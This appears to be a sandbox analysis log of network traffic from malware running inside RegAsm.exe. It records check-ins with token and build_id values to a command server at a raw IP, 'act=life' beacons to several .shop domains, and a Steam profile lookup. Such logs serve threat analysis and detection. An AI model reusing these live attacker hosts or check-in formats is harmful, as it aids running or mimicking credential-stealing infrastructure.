                                                                                    2024-09-26 22:15:10 UTC782INHTTP/1.1 200 OK
                                                                                    Date: Thu, 26 Sep 2024 22:15:09 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=pnj7htelf6jjkiek837uak5m8l; expires=Mon, 20 Jan 2025 16:01:48 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=npauBt6xZDPEFi%2BjbQ%2FbU6z%2BqF6Je4aBU%2BG6VBpQam0EM1%2BJdoI4oe9mv9Jgs6dLoUyN18mDdoCps41BGfkxNNxxhuTMnKj5kEQ1O4pupjUYp%2B835Ey%2BIwlr4kigaoQvT6zUlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c969c6d6d664379-EWR
                                                                                    2024-09-26 22:15:10 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                    Data Ascii: aerror #D12
                                                                                    2024-09-26 22:15:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    28192.168.2.4497695.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:09 UTC277OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFH
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 499
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:15:09 UTC499OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------GIEHJKEBAAEBGCAAEBFHCont
                                                                                    2024-09-26 22:15:10 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:15:10 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:15:10 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 2ok0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    29192.168.2.449770188.114.96.34431220C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:10 UTC266OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: offensivedzvju.shop
                                                                                    2024-09-26 22:15:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-09-26 22:15:11 UTC768INHTTP/1.1 200 OK
                                                                                    Date: Thu, 26 Sep 2024 22:15:11 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=tkohvba6q9nqq6q8h6rke9icvr; expires=Mon, 20 Jan 2025 16:01:50 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kfWVKL9xCrsNWLHwFW0UZlYuAnGedIF3thEhUB8QDBZCF%2BzmzQ%2FHrGnAYWO07zuonaXmmpoWm9w9VzkY9GGDWb7Bw83UwMK3c34J55OZBJrpnu3C0JQtmAJRlctnv5oOhoa0nqSY"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c969c74c9b732d0-EWR
                                                                                    2024-09-26 22:15:11 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                    Data Ascii: aerror #D12
                                                                                    2024-09-26 22:15:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    30192.168.2.449771188.114.97.34431220C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:12 UTC263OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: vozmeatillu.shop
                                                                                    2024-09-26 22:15:12 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-09-26 22:15:12 UTC766INHTTP/1.1 200 OK
                                                                                    Date: Thu, 26 Sep 2024 22:15:12 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=q7moi7eig0ak6q3r11jjr11efq; expires=Mon, 20 Jan 2025 16:01:51 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OTWhk%2BoNAnu2hzIJyXYtXSRl52uH0gJiKfPbyrOOWhsq60%2FISjkUjATFjrV0bmorinEv%2F488nG1gp0xO1uYDw7kn2FUGxxnpn3t37u6wt6TfgwpU96nVGTYjqnOmdy7nzX8b"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c969c7c9a3b43da-EWR
                                                                                    2024-09-26 22:15:12 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                    Data Ascii: aerror #D12
                                                                                    2024-09-26 22:15:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    31192.168.2.4497725.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:12 UTC277OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----DBFBFBGDBKJJKFIEHJDB
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 499
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:15:12 UTC499OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------DBFBFBGDBKJJKFIEHJDBContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------DBFBFBGDBKJJKFIEHJDBContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------DBFBFBGDBKJJKFIEHJDBCont
                                                                                    2024-09-26 22:15:13 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:15:12 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:15:13 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 2ok0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    32192.168.2.449773172.67.162.1084431220C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:12 UTC263OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: drawzhotdog.shop
                                                                                    2024-09-26 22:15:12 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-09-26 22:15:13 UTC766INHTTP/1.1 200 OK
                                                                                    Date: Thu, 26 Sep 2024 22:15:13 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=ofb1b5c6jkpc33l11a3vo7ajim; expires=Mon, 20 Jan 2025 16:01:52 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oq2g4IHpi1cbFDXGqtGiP0ANSzj%2FMuyLTxBr%2B8Zhz3td0Atv3On48bMnLQ%2Fk2Uj3PjzBm0U1g3OImLwc583muYWpf2qsFffVo3xhfkZRTFxjzji7qupq06AfxIMo5382fHr2"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c969c82986642e3-EWR
                                                                                    2024-09-26 22:15:13 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                    Data Ascii: aerror #D12
                                                                                    2024-09-26 22:15:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    33192.168.2.4497755.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:13 UTC277OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKK
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 331
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:15:13 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------EHIDAKECFIEBGDHJEBKKCont
                                                                                    2024-09-26 22:15:14 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:15:14 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:15:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    34192.168.2.449776188.114.96.34431220C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:13 UTC263OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: fragnantbui.shop
                                                                                    2024-09-26 22:15:13 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-09-26 22:15:14 UTC766INHTTP/1.1 200 OK
                                                                                    Date: Thu, 26 Sep 2024 22:15:14 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=09scgboql2d8a8tjvoiaobmfcu; expires=Mon, 20 Jan 2025 16:01:53 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BD5jU9MrTdCImL8yenbAPaMD%2F7KK5aJeIiYBLxWApOZYS2sOxg0xhLGZF4dMvzYkzf%2B0yXYQBbkvOmibyoBBLjAjuN%2FcEw3o5zpEaem5CxnhCgn5eZj05BDqQQ7z2o9A5sT4"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c969c888b527cae-EWR
                                                                                    2024-09-26 22:15:14 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                    Data Ascii: aerror #D12
                                                                                    2024-09-26 22:15:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    35192.168.2.449777188.114.97.34431220C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:14 UTC265OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: stogeneratmns.shop
                                                                                    2024-09-26 22:15:14 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-09-26 22:15:16 UTC776INHTTP/1.1 200 OK
                                                                                    Date: Thu, 26 Sep 2024 22:15:15 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=36el3n1is103thnlfno80jgimn; expires=Mon, 20 Jan 2025 16:01:54 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gzjX68uOprJd95Xh%2B84mlaK5zBk2A0Z81wXDafGqV1Dke%2BJZRlhNAfUzCEyZbYtaaC%2F%2B%2FGlSqlUnJHh4AbD9FcxnPC2PHfWnoJm9AcFpACqsP5X1GVugR8KHB9icsggE0Inf9hg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c969c8ebb0d18ea-EWR
                                                                                    2024-09-26 22:15:16 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                    Data Ascii: aerror #D12
                                                                                    2024-09-26 22:15:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    36192.168.2.449779172.67.208.1394431220C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:16 UTC263OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: reinforcenh.shop
                                                                                    2024-09-26 22:15:16 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-09-26 22:15:18 UTC796INHTTP/1.1 200 OK
                                                                                    Date: Thu, 26 Sep 2024 22:15:18 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=e2814fduhiu1pijpqog2l4kr22; expires=Mon, 20 Jan 2025 16:01:56 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XEP5bPWzww6mxmBSSV51hY%2B4T7Sdtk5LBj%2FZ7tlGsKlLdGKXJlwifVnPQvXNsKi8R%2FJ1MBKh98xjZxh637KR2jS9UolJZ5grSpqS3IXccHXbjh9eU6TvBQhibeS8lF5Mt4DI"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c969ca03b1d42e1-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-09-26 22:15:18 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                    Data Ascii: aerror #D12
                                                                                    2024-09-26 22:15:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    37192.168.2.449780104.102.49.2544431220C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:18 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Host: steamcommunity.com
                                                                                    2024-09-26 22:15:19 UTC1870INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                    Cache-Control: no-cache
                                                                                    Date: Thu, 26 Sep 2024 22:15:19 GMT
                                                                                    Content-Length: 34663
                                                                                    Connection: close
                                                                                    Set-Cookie: sessionid=2dc448062533e99854c1b8ae; Path=/; Secure; SameSite=None
                                                                                    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                    2024-09-26 22:15:19 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                    2024-09-26 22:15:19 UTC16384INData Raw: 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61
                                                                                    Data Ascii: ernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" a
                                                                                    2024-09-26 22:15:19 UTC3765INData Raw: 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70
                                                                                    Data Ascii: e info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content "><div class="p


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
